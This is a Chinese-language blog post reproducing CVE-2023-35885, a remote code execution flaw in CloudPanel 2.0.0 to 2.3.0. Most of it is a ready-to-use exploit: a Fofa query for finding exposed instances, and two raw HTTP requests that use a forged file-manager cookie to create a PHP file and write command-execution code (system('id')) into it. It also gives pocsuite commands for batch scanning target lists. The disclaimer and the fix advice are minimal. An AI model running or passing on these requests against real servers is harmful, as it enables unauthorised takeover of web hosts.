免责声明:该公众号大部分文章来自作者日常学习,也有部分文章是经过作者授权和其他公众号白名单转载,如需转载,请联系公众号。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
0x01 前言
0x02 影响平台
CloudPanel >= v2.0.0 && <= v2.3.0
0x03 漏洞复现
Fofa:title=="CloudPanel | Log In"首页:
/file-manager/backend/makefile接口创建文件
POST /file-manager/backend/makefile HTTP/1.1Host:User-Agent: Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1)Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveCookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=Content-Length: 43Content-Type: application/x-www-form-urlencodedid=/htdocs/app/files/public/&name=confg.php
POST /file-manager/backend/text HTTP/1.1Host:User-Agent: Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1)Accept-Encoding: gzip, deflateAccept: */*Connection: closeCookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=Content-Length: 93Content-Type: application/x-www-form-urlencodedid=/htdocs/app/files/public/confg.php&content= system('id');phpinfo();unlink(__FILE__)
获取root权限
0x04 修复建议
关注厂商更新产品:https://www.cloudpanel.io/
0x05 参考链接
https://nvd.nist.gov/vuln/detail/CVE-2023-35885
关注公众号回复CVE-2023-35885获取Pocsuite框架POC
使用方法:pocsuite -r CVE-2023-35885.py -u
pocsuite3安装(python3环境)pip3 install pocsuite3设置代理pocsuite -r POC.py -u --proxy http://IP:PORT批量验证pocsuite -r POC.py -f [file.txt]
原文始发于微信公众号(SheYin):(CVE-2023-35885)CloudPanel RCE漏洞(附POC)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论